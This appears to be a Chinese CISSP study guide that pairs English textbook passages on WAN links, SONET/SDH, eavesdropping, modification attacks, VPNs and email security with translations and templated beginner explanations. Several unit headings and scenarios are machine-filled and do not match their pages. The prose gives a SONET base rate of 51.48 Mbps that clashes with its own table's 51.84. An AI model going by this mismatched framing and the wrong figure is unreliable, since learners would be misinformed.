本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 62 / PDF P899

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Cable TV–based Internet service does not fit well into either the dedicated or the nondedicated classification. Cable Internet is an always-on system, but not between two client locations. Instead, it is a link from your premises to an Internet gateway. Thus, it can be labeled as a point-to-multipoint connection. Another wrinkle is that cable Internet service is also typically shared with the other subscribers in the neighborhood. Privacy is maintained through encryption, similar to a VPN, from the cable modem deployed at your location to an exit point in the cable company's network, typically immediately connected to the Internet gateway.

A nondedicated line is one that requires a connection to be established before data transmission can occur. A nondedicated line can be used to connect with any remote system that uses the same type of nondedicated line. Fault Tolerance with Carrier Network Connections To obtain fault tolerance with leased lines or with connections to carrier networks, you must deploy two redundant connections. For even greater redundancy, you should purchase the connections from two different telcos or service providers. However, when you're using two different service providers, be sure they don't connect to the same regional backbone or share any major pipeline.

The physical location of multiple communication lines leading from your building is also of concern because a single disaster or human error (e.g., a misguided backhoe) could cause multiple lines to fail at once. If you cannot afford to deploy an exact duplicate of your primary dedicated leased line, consider a nondedicated connection. These less expensive options may still provide partial availability in the event of a primary leased line failure. Standard classic dial-up modems and DSL modems are examples of nondedicated lines. Digital subscriber line (DSL) is a technology that exploits the upgraded telephone network to grant consumers speeds from 144 Kbps to 100 Mbps (or more).

There are numerous formats of DSL (e.g., ASDL, VSDL, and SDSL), and each format varies according to the specific downstream and upstream bandwidth provided.

中文直译 / 整理

有线电视基础的互联网服务并不完全符合专用或非专用分类。 有线互 联网是一种始终在线的系统,但并非在两个客户端位置之间建立连接,而 是从您的 premises 连接到互联网网关。 因此,它可以被标记为点对多点 连接。 另一个特点是,有线互联网服务通常还与邻近的其他订阅用户共享。 隐私通过加密技术得以保障,类似于VPN,从您位置部署的有线调制解调 器到有线公司网络的出口点(通常直接连接到互联网网关)之间进行加密。 一条非专用线路是指在数据传输之前必须建立连接的线路。 非专用线路可用于 连接任何使用相同类型非专用线路的远程系统。 故障容错与运营商网络连接 要通过租用线路或与运营商网络的连接实现故障容错,您必须部署两条冗 余连接。 为实现更高的冗余度,建议从两家不同的电信公司或服务提供商 购买这些连接。 然而,当您使用两家不同的服务提供商时,请确保它们不 连接到同一区域主干网或共享任何主要传输通道。 多个通信线路从您建筑 物引出的物理位置也值得关注,因为单一灾难或人为错误(例如,误操作 的挖掘机)可能导致多条线路同时中断。 如果您无法负担部署与主专用租 用线路完全相同的副本,可以考虑使用非专用连接。

这些成本较低的选项 在主租用线路发生故障时,仍可能提供部分可用性。 标准的模拟拨号调制解调器和DSL调制解调器是非专用线路的示例。 数字用户 线路(DSL)是一种利用升级后的电话网络为用户提供144 Kbps至100 Mbps(或更高)速度的技术。 DSL有多种格式(例如ADSL、VDSL和SDSL), 每种格式根据提供的特定下行和上行带宽而有所不同。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 63 / PDF P900

第 900 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Backhaul networks constitute the segment linking smaller or local networks to a central hub or the broader Internet. Various WAN technologies are applied in this context to ensure effective connectivity. MPLS (Multiprotocol Label Switching) stands out as a prevalent choice, offering scalability and efficiency by utilizing labels for packet routing. This approach is conducive to connecting diverse locations and supporting quality of service (QoS) features.

Additionally, Ethernet-based solutions, such as Metro Ethernet, are commonly employed in backhaul connections, providing high bandwidth, scalability, and flexibility for applications spanning cell towers, business locations, and data centers. Satellite communications involve the transmission of data between Earthbased stations or satellite-enabled devices, relying on satellites orbiting Earth. In this domain, very-small-aperture terminal (VSAT) technology plays a pivotal role. VSAT enables small, remote terminals to communicate with geostationary satellites, proving useful in locations where traditional wired or terrestrial connections pose challenges.

Satellite broadband services leverage satellites to extend Internet connectivity to remote or underserved areas. Users with satellite dishes can establish connections, facilitating broadband access where terrestrial options may be limited. Moreover, the emergence of low Earth orbit (LEO) satellites, exemplified by projects like Starlink, offers a contemporary approach to satellite communications with reduced latency compared to traditional geostationary satellites. LEO satellites aim to provide high-speed Internet access globally. Broadband over power lines (BPL) is a technology that enables high-speed data transmission over existing electrical power lines.

In a BPL system, data signals are transmitted along the same infrastructure that is used to deliver electric power. This technology leverages the extensive network of power lines to provide broadband Internet access to homes, businesses, and other locations. While BPL has been explored as a potential solution for extending broadband access, its adoption has been limited compared to other technologies like DSL, cable, and fiber optics. Factors such as technical challenges, regulatory considerations, and the growth of alternative broadband technologies have influenced the deployment and acceptance of BPL in different regions.

中文直译 / 整理

回传网络构成将较小或本地网络连接到中心枢纽或更广泛互联网的链路。 在此 背景下,各种广域网技术被应用于确保有效的连接。 多协议标签交换( MPLS)是一种常见的选择,它通过使用标签进行数据包路由,提供了可扩展 性和效率。 这种方法有利于连接不同地点并支持服务质量(QoS)功能。 此外, 基于以太网的解决方案,如城域以太网,也常用于回传连接,为跨越基站、企 业地点和数据中心的应用提供高带宽、可扩展性和灵活性。 卫星通信涉及地球基站或卫星支持设备之间的数据传输,依赖于环绕地球运行 的卫星。 在这一领域,甚小孔径终端(VSAT)技术发挥着关键作用。 VSAT使 小型远程终端能够与地球静止卫星通信,在传统有线或地面连接存在困难的地 区尤为有用。 卫星宽带服务利用卫星将互联网连接扩展到偏远或服务不足的地 区。 用户通过卫星天线即可建立连接,从而在地面选项有限的地区实现宽带接 入。 此外,以Starlink等项目为代表的低地球轨道(LEO)卫星的出现,为卫 星通信提供了一种新的方式,其延迟较传统地球静止卫星更低。 LEO卫星旨在 实现全球高速互联网接入。 电力线宽带(BPL)是一种通过现有电力线路实现高速数据传输的技术。

在 BPL系统中,数据信号通过用于输送电力的同一基础设施进行传输。 该技术利 用广泛的电力线路网络,为家庭、企业及其他场所提供宽带互联网接入。 尽管 BPL曾被探索作为扩展宽带接入的潜在解决方案,但其采用率相较于DSL、电 缆和光纤等其他技术仍较为有限。 技术挑战、监管考量以及替代宽带技术的发 展,影响了BPL在不同地区的部署与接受程度。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 900 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 64 / PDF P901

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Integrated Services Digital Network (ISDN) was the planned replacement for PSTN, but with the advent of DSL, cable Internet, and fiber options, it did not gain widespread adoption. Most ISDN services have been discontinued. Fiber-Optic Links Synchronous Digital Hierarchy (SDH) and Synchronous Optical Network (SONET) are fiber-optic high-speed networking standards. SDH was standardized by the International Telecommunications Union (ITU) and SONET by the American National Standards Institute (ANSI). SDH and SONET are mostly hardware or physical layer standards defining infrastructure and line speed requirements.

SDH and SONET use synchronous time-division multiplexing (TDM) for high-speed duplex communications with minimal need for control and management overhead. While SDH and SONET have some regional differences in their standards, they are functionally similar and are often used interchangeably or in conjunction with each other, particularly in international networks. STS (Synchronous Transport Signal) (or Optical Carrier (OC)) is associated with SONET, while STM (Synchronous Transport Module) is associated with SDH. Both STS and STM represent standardized levels within their respective hierarchies for organizing and multiplexing digital signals.

These optical transmission services support a foundational speed of 51.48 Mbps. The main bandwidth levels of SDH and SONET are shown in Table 12.3.

中文直译 / 整理

综合业务数字网(ISDN)原计划作为公共交换电话网络(PSTN) 的替代方案,但随着DSL、电缆互联网和光纤选项的出现,它并未获得广 泛采用。 大多数ISDN服务已被终止。 光纤链路 同步数字体系(SDH) 和 同步光网络(SONET) 是光纤高速网络标准。 SDH 由国际电信联盟(ITU)标准化,SONET 由美国国家标准协会( ANSI)标准化。 SDH 和 SONET 主要是硬件或物理层标准,定义了基础设 施和线路速度要求。 SDH 和 SONET 使用同步时分复用(TDM)实现高速 全双工通信,对控制和管理开销的需求最小。 尽管SDH和SONET在标准上存在一些区域差异,但它们在功能上相似,常在 国际网络中互换使用或结合使用。 STS(同步传输信号)(或光载波(OC)) 与SONET相关,而STM(同步传输模块)与SDH相关。 STS和STM分别代表 其各自层次结构中的标准化级别,用于组织和复用数字信号。 这些光传输服务 支持51.48 Mbps的基础速率。 SDH和SONET的主要带宽级别如表12.3所示。

小白解释

场景先行:你是公司的安全负责人,正在读第 901 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 65 / PDF P902

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

TABLE 12.3 Bandwidth levels of SDH and SONET SONET SDH Data rate STS-1/OC-1 STM-0 51.84 Mbps STS-3/OC-3 STM-1 155.52 Mbps STS-12/OC-12 STM-4 622.08 Mbps STS-48/OC-48 STM-16 2.488 Gbps STS-96/OC-96 STM-32 4.876 Gbps STS-192/OC-192 STM-64 9.953 Gbps STS-768/OC-768STM-25639.813 Gbps Note: The SDH service numbers are 1/3 that of SONET's. SDH and SONET both support mesh and ring topologies. These fiber solutions are often implemented as the backbone of a telco service, and divisions or fractions of the capacity are subscribed out to customers.

Prevent or Mitigate Network Attacks Communication systems are vulnerable to attacks in much the same way any other aspect of the IT infrastructure is vulnerable. Understanding the threats and possible countermeasures is an important part of securing an environment. Any activity or condition that can cause harm to data, resources, or personnel must be addressed and mitigated if possible. Keep in mind that harm includes more than just destruction or damage; it also includes disclosure, access delay, denial of access, fraud, resource waste, resource abuse, and loss.

Common threats against communication system security include DoS (see Chapter 17, “Preventing and Responding to Incidents”), impersonation (see Chapter 2), replay (see Chapter 11), ARP poisoning (see Chapter 11), DNS poisoning (see Chapter 11), eavesdropping, and transmission modification. Eavesdropping As the name suggests, eavesdropping is listening to communication traffic for the purpose of duplicating it. The duplication can take the form of recording data to a storage device or using an extraction program that dynamically attempts to extract the original content from the traffic stream. Once a copy of traffic content is in the hands of an attacker, they can often

中文直译 / 整理

表 12.3 SDH 和 SONET 的带宽级别 SONET SDH 数据速率 STS‑1/OC‑1 STM‑0 51.84 Mbps STS‑3/OC‑3 STM‑1 155.52 Mbps STS‑12/OC‑12 STM‑4 622.08 Mbps STS‑48/OC‑48 STM‑16 2.488 Gbps STS‑96/OC‑96 STM‑32 4.876 Gbps STS‑192/OC‑192 STM‑64 9.953 Gbps STS‑768/OC‑768 STM‑256 39.813 Gbps 注意:SDH的服务编号是SONET的1/3。 SDH 和 SONET 均支持网状和环形拓扑。 这些光纤解决方案通常作为电 信服务的骨干网络实施,其容量的划分或部分会被订阅给客户。 预防或缓解网络攻击 通信系统与 IT 基础设施的其他方面一样,容易受到攻击。 了解威胁及可能的 应对措施是保障环境安全的重要部分。 任何可能对数据、资源或人员造成损害 的活动或情况都必须加以处理,并尽可能缓解。 请注意,损害不仅包括破坏或 损坏,还包括信息泄露、访问延迟、拒绝访问、欺诈、资源浪费、资源滥用和 丢失。

通信系统安全的常见威胁包括 DoS(参见第 17 章,“预防和应对事件”)、 假冒(参见第 2 章)、重放(参见第 11 章)、ARP 欺骗(参见第 11 章)、 DNS 欺骗(参见第 11 章)、窃听和传输修改。 窃听 顾名思义,窃听是指监听通信流量以复制其内容。 复制可以表现为将数据记 录到存储设备,或使用提取程序动态尝试从流量流中提取原始内容。 一旦攻 击者获得了流量内容的副本,他们通常可以

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 66 / PDF P903

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

extract many forms of confidential information, such as usernames, passwords, process procedures, and data. Eavesdropping usually requires physical access to the IT infrastructure to connect a physical recording device to an open port or cable splice or to install a software-recording tool onto the system. Eavesdropping is often facilitated by the use of a network traffic capture or monitoring program or a protocol analyzer system (often called a sniffer). Eavesdropping devices and software are usually difficult to detect because they are used in passive attacks.

When eavesdropping or wiretapping is transformed into altering or injecting communications, the attack is considered an active attack. You can combat eavesdropping by maintaining physical access security to prevent unauthorized personnel from accessing your IT infrastructure. As for protecting communications that occur outside your network or for protecting against internal attackers, using encryption (such as IPSec or SSH) and onetime authentication methods (onetime pads or token devices) on communication traffic will greatly reduce the effectiveness and timeliness of eavesdropping.

Application allow listings should also be considered as a means to prevent the execution of unauthorized software, such as sniffers. Modification Attacks In modification attacks, captured packets are altered and then played against a system. Modified packets are designed to bypass the restrictions of improved authentication mechanisms and session sequencing. Countermeasures to modification replay attacks include using digital signature verifications and packet checksum verification (i.e., integrity checking). Summary Transmission Control Protocol/Internet Protocol (TCP/IP) is the primary protocol suite used on most networks and on the Internet.

It is a robust protocol suite, but it has numerous security deficiencies. Authentication and encryption need to be implemented to account for TCP/IP's deficiencies. When securing communication channels, be sure to address voice, remote access, multimedia collaboration, data communications (such as email), and virtualized networks.

中文直译 / 整理

提取多种形式的机密信息,例如用户名、密码、流程步骤和数据。 窃听通常需要物理访问IT基础设施,以将物理录音设备连接到开放端口或电缆 接头,或在系统上安装软件录音工具。 窃听通常借助网络流量捕获或监控程序 或协议分析系统(通常称为嗅探器)来实现。 由于窃听设备和软件通常用于被 动攻击,因此难以检测。 当窃听或搭线监听被转化为篡改或注入通信时,该攻 击被视为主动攻击。 您可以通过维护物理访问安全来防止未经授权的人员访问您的IT基础设施,从 而应对窃听。 对于保护发生在您网络之外的通信或防范内部攻击者,使用加密 (如IPSec或SSH)和一次性认证方法(一次性密码本或令牌设备)对通信流 量进行保护,将大大降低窃听的有效性和时效性。 还应考虑使用应用程序允许 列表来防止未经授权的软件(如嗅探器)执行。 修改攻击 在修改攻击中,捕获的数据包被篡改后重新发送到系统中。 修改后的数据包旨 在绕过增强的身份验证机制和会话序列的限制。 针对修改重放攻击的应对措施 包括使用数字签名验证和数据包校验和验证(即完整性检查)。 摘要 传输控制协议/互联网协议(TCP/IP)是大多数网络和互联网上使用的主要协 议套件。

它是一个健壮的协议套件,但存在诸多安全缺陷。 为弥补TCP/IP的 缺陷,需要实现身份验证和加密。 在保护通信通道时,请务必处理语音、远程访问、多媒体协作、数据通信(如 电子邮件)和虚拟化网络。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 67 / PDF P904

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Secure voice communications can be achieved by evaluating and hardening PSTN, PBX, mobile, and VoIP solutions. VoIP security is often achieved through general network security practices and using Secure Real-time Transport Protocol (SRTP). Remote access security management requires security system designers to address the hardware and software components of the implementation along with policy issues, work task issues, and encryption issues. This includes deployment of secure communication protocols. Secure authentication for both local and remote connections is an important foundational element of overall security.

Maintaining control over communication pathways is essential to supporting confidentiality, integrity, and availability for network, voice, and other forms of communication. Numerous attacks are focused on intercepting, blocking, or otherwise interfering with the transfer of data from one location to another. Fortunately, there are also reasonable countermeasures to reduce or even eliminate many of these threats. VPNs are a common means to achieve data communications security. VPNs are based on encrypted tunneling. Tunneling, or encapsulation, is a means by which messages in one protocol can be transported over another network or communications system using a second protocol.

VPN solutions include IPSec, TLS, SSH, L2TP, and PPTP. Telecommuting, or remote connectivity, has become a common feature of business computing. When remote access capabilities are deployed in any environment, security must be considered and implemented to provide protection for your private network against remote access complications. Remote access users should be stringently authenticated before being granted access. Remote access services include Voice over IP (VoIP), application streaming, VDI, multimedia collaboration, and instant messaging. Email is insecure unless you take steps to secure it.

To secure email, you should provide for nonrepudiation, restrict access to authorized users, make sure integrity is maintained, authenticate the message source, verify delivery, and classify sensitive content. These issues must be addressed in a security policy before they can be implemented in a solution. They often take the form of acceptable use policies, access controls, privacy declarations, email management procedures, and backup and retention policies. Email is a common delivery mechanism for malicious code. Filtering attachments, using antivirus software, and educating users are effective

中文直译 / 整理

通过评估和加固PSTN、PBX、移动和VoIP解决方案,可以实现安全的语音 通信。 VoIP安全通常通过通用网络安全实践和使用安全实时传输协议( SRTP)来实现。 远程访问安全管理要求安全系统设计者同时解决实施中的硬件和软件组件,以 及策略问题、工作任务问题和加密问题。 这包括部署安全通信协议。 对本地和 远程连接进行安全认证是整体安全的重要基础要素。 对通信路径的控制对于保障网络、语音及其他形式通信的机密性、完整性和可 用性至关重要。 许多攻击都旨在截获、阻断或以其他方式干扰数据从一个位置 到另一个位置的传输。 幸运的是,也存在合理的应对措施,可以减少甚至消除 许多此类威胁。 虚拟专用网络(VPN)是实现数据通信安全的常用手段。 VPN基于加密隧道技 术。 隧道或封装是一种通过第二协议在另一个网络或通信系统上传输第一协议 消息的方法。 VPN解决方案包括IPSec、TLS、SSH、L2TP和PPTP。 远程办公或远程连接已成为商业计算的常见功能。 当在任何环境中部署远程访 问功能时,必须考虑并实施安全措施,以保护您的私有网络免受远程访问带来 的风险。 在授予访问权限之前,应对远程访问用户进行严格的身份验证。

远程 访问服务包括语音互联网协议(VoIP)、应用流式传输、虚拟桌面基础设施 (VDI)、多媒体协作和即时消息。 电子邮件是不安全的,除非您采取措施加以保护。 为保障电子邮件安全,您应 确保不可否认性性、限制仅授权用户访问、确保完整性、验证消息来源、确认投 递成功,并对敏感内容进行分类。 这些问题必须在解决方案中实施之前,通过 安全策略加以解决。 它们通常表现为可接受使用政策、访问控制、隐私声明、 电子邮件管理流程以及备份和保留策略。 电子邮件是恶意代码的常见传播方式。 过滤附件、使用防病毒软件和教育用 户是有效的

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
学习单元 68 / PDF P905

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

countermeasures against that kind of attack. Email spamming or flooding is a form of denial of service that can be deterred through filters and IDSs. Email security can be improved using S/MIME and PGP. Fax and voice security can be improved by using encryption to protect the transmission of documents and prevent eavesdropping. Training users effectively is a useful countermeasure against social engineering attacks. Virtual networks are software or digital re-creations of physical concepts in order to achieve security or performance improvements.

Examples of virtual networks include software-defined networks (SDNs), VPNs, VLANs, virtual switches, virtual SANs, guest operating systems, port isolation, and NAT. A VLAN is a hardware-imposed network segmentation created by switches. VLANs are used to logically segment a network without altering its physical topology. VLANs are used for traffic management. NAT is used to hide the internal structure of a private network as well as to enable multiple internal clients to gain Internet access through a few public IP addresses. Third-party connectivity is a growing concern for businesses. Thus, it is important to consider the risks and ramifications.

Any time an organizational network is connected directly to another entity's network, their local threats and risks affect each other. A compromise of one organization can lead easily to the compromise of the other. Any connection between IT environments should be planned out in detail well in advance of actually interconnecting the cabling (whether physical or virtual). Often, this process starts with an MOU and ends with an ISA. WAN links, or long-distance connection technologies, can be divided into two primary categories: dedicated and nondedicated lines. A dedicated line connects two specific endpoints and only those two endpoints.

A nondedicated line is one that requires a connection to be established before data transmission can occur. Communication systems are vulnerable to many attacks, including distributed denial-of-service (DDoS), eavesdropping, impersonation, replay, modification, spoofing, and ARP and DNS attacks. Fortunately, effective countermeasures exist for each of these. Study Essentials

中文直译 / 整理

应对此类攻击的措施。 电子邮件垃圾邮件或泛滥是一种拒绝服务攻击,可通过过滤 器和入侵检测系统加以防范。 使用S/MIME和PGP可以提升电子邮件安全性。 通过使用加密技术保护文档传输并防止窃听,可以提高传真和语音的安全 性。 对用户进行有效培训是应对社会工程学攻击的有效对策。 虚拟网络是物理概念的软件或数字重现,旨在实现安全或性能提升。 虚拟网络 的示例包括软件定义网络(SDN)、VPN、VLAN、虚拟交换机、虚拟SAN、 客户操作系统、端口隔离和NAT。 VLAN是由交换机实施的硬件级网络分段,用于在不改变物理拓扑结构的情 况下逻辑划分网络。 VLAN用于流量管理。 NAT用于隐藏私有网络的内部结构,并使多个内部客户端能够通过少数公共 IP地址访问互联网。 第三方连接已成为企业日益关注的问题。 因此,必须考虑相关风险和影响。 每 当一个组织的网络直接连接到另一个实体的网络时,双方的本地威胁和风险会 相互影响。 一方的被入侵很容易导致另一方也被入侵。 任何IT环境之间的连接 都应在实际布线(无论是物理还是虚拟)之前详细规划。 通常,这一过程从备 忘录(MOU)开始,以安全协议(ISA)结束。

